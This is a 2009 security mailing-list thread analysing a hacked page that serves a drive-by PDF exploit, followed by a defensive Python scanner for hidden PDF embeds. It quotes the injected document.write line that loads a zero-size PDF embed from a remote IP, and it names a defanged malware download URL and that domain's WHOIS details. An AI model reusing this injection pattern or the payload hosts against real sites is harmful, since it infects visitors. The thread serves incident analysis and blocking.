On Mon, Apr 20, 2009 at 10:42 AM, Jake Mailinglists <[email protected]> wrote:
> Paul,
> I noticed that in the PDF file but as the domain doesn't seem to have
> resolution I didn't mention it.
>
> Jake
>
> WHOIS information on the domain
>
> Whois Record
>
> domain: TEST1.RU
> type: CORPORATE
> nserver: ns1.centerhost.ru.
> nserver: ns1.cetis.ru.
> state: REGISTERED, DELEGATED
> org: Center of Effective Technologies and Systems CETIS
> phone: +7 4957711654
> fax-no: +7 4957879251
> e-mail: <http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a>
> e-mail: <http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff>
> registrar: REGRU-REG-RIPN
> created: 2001.03.30
> paid-till: 2010.04.03
> source: TC-RIPN
>
> Registry Data Created: 2001-03-30 Expires: 2010-04-03 Whois Server: whois.ripn.net
> Server Data Domain Status: Registered And No Website
>
>
> On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson <[email protected]> wrote:
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <[email protected]> wrote:
>>
>> >> I took a quick look at the code... formatted it in a pastebin here:
>> >> http://pastebin.com/m7b50be54
>> >>
>> >> That javascript writes this to the page (URL obscured):
>> >> document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
>> >>
>> >> The 1.2.3.4 in the URL is my public IP address (I changed that).
>> >>
>> >> Below the javascript, it grabs a PDF:
>> >> <embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
>> >>
>> >> That PDF is on the site, I haven't looked at it yet though.
>> >>
>>
>> Not only is that .pdf malicious, when "executed" it also fetches additional malware from:
>>
>> hxxp:// test1.ru /1.1.1/load.php
>>
>> If that host is not in your block list, it should be -- known purveyor of crimeware.
>>
>> This is in addition to the other malicious URLs mentioned in this thread.
>>
>> - - ferg
>>
>> -----BEGIN PGP SIGNATURE-----
>> Version: PGP Desktop 9.5.3 (Build 5003)
>>
>> wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI
>> mxM8Ci/feKnJe6M6qbiESPw=
>> =b0Yj
>> -----END PGP SIGNATURE-----
>>
>> --
>> "Fergie", a.k.a. Paul Ferguson
>> Engineering Architecture for the Internet
>> fergdawgster(at)gmail.com
>> ferg's tech blog: http://fergdawg.blogspot.com/
>>
>
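A defender-side check in the spirit of the analysis quoted above, added here as an example and not code from the thread or its participants: it recovers the markup that a page's document.write("...") calls would emit, then flags zero-size <embed>/<iframe>/<object> elements that load a PDF, the pattern Chris Mills describes. The host, path and query string in the sample input are constructed placeholders, not the indicators from the thread.

```python
import re

# Constructed sample input, modelled on the landing page discussed above: a
# document.write() that emits a zero-size <embed> pulling a PDF from a remote
# host, plus a static <embed> of a local PDF.  Host, path and query string
# are placeholders (RFC 5737 address), not the thread's indicators.
SAMPLE_JS = r'''document.write("<embed src=\"http://198.51.100.7/inc/spl.php?stat=Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");'''
SAMPLE_HTML = '<p>hi</p><embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>'

DOC_WRITE = re.compile(r'document\.write\(\s*"((?:\\.|[^"\\])*)"\s*\)', re.S)
EMBED = re.compile(r'<(embed|iframe|object)\b([^>]*)>', re.I)
ATTR = re.compile(r'([\w:-]+)\s*=\s*"([^"]*)"')

def unescape_js(s):
    # Undo JS string escapes (\" \\ \/) to recover the HTML the script writes.
    return re.sub(r'\\(.)', r'\1', s, flags=re.S)

def written_markup(js):
    """All HTML fragments the page would receive via document.write("...")."""
    return [unescape_js(m.group(1)) for m in DOC_WRITE.finditer(js)]

def is_hidden(attrs):
    # A frame of 0 or 1 pixel in either dimension renders nothing visible,
    # which is how drive-by loaders keep the plugin content off screen.
    for key in ('width', 'height'):
        val = attrs.get(key, '').strip().lower().rstrip('px')
        if val.isdigit() and int(val) <= 1:
            return True
    return False

def loads_pdf(attrs):
    src = attrs.get('src', '').lower().split('?', 1)[0]
    return attrs.get('type', '').lower() == 'application/pdf' or src.endswith('.pdf')

def suspicious_embeds(markup):
    """Return (tag, src) for every hidden plugin element that loads a PDF."""
    hits = []
    for m in EMBED.finditer(markup):
        attrs = {k.lower(): v for k, v in ATTR.findall(m.group(2))}
        if is_hidden(attrs) and loads_pdf(attrs):
            hits.append((m.group(1).lower(), attrs.get('src', '')))
    return hits

def scan_page(js, static_html):
    # Check markup produced at runtime and markup already in the page body.
    hits = []
    for fragment in written_markup(js) + [static_html]:
        hits.extend(suspicious_embeds(fragment))
    return hits
```

Running scan_page(SAMPLE_JS, SAMPLE_HTML) reports both the remotely loaded spl.php embed and the local two.pdf embed; a visible, normally sized embed is not flagged.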

